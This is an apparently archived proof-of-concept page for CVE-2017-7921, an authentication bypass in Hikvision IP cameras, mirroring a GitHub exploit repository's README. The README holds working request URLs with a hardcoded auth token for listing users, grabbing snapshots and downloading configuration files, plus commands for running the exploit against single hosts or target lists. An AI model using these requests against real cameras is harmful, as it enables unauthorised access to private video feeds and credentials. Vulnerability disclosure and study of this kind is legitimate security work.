Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-7921 PoC — 多款Hikvision产品安全漏洞

Source
https://github.com/inj3ction/CVE-2017-7921-EXP
Associated Vulnerability
Title:多款Hikvision产品安全漏洞 (CVE-2017-7921)
Description:Hikvision DS-2CD2xx2F-I Series等都是中国海康威视(Hikvision)公司的网络摄像头产品。 多款Hikvision产品中存在身份验证漏洞。攻击者可利用该漏洞提升权限,获取敏感信息的访问权限。以下产品和版本受到影响:Hikvision DS-2CD2xx2F-I Series 5.2.0 build 140721版本至5.4.0 build 160530版本;DS-2CD2xx0F-I Series 5.2.0 build 140721版本至5.4.0 Build 16040
Readme
# CVE-2017-7921 Exploit

An Improper Authentication issue was discovered in Hikvision  devices.

​    The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users.

​    This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.

           # inj3ction

​    https://seclists.org/fulldisclosure/2017/Sep/23



​    Vulnerability details:

​    \----------------------

​    Retrieve a list of all users and their roles:

​        http://camera.ip/Security/users?auth=YWRtaW46MTEK

​    Obtain a camera snapshot without authentication:

​        http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

​    And worst of all, one can download camera configuration:

​        http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK



## Install dependence

```python
python3 -m pip install -r requirements.txt
```

## Usage

```python3
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
```

## Screenshot

![](./Screenshot.jpg)
File Snapshot

 [4.0K]  /data/pocs/499606f95fb82d98645709d7437326a1aa067525
├── [5.2K]  CVE_2017_7921_EXP.py
├── [1.1K]  README.md
├── [  45]  requirements.txt
└── [692K]  Screenshot.jpg

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.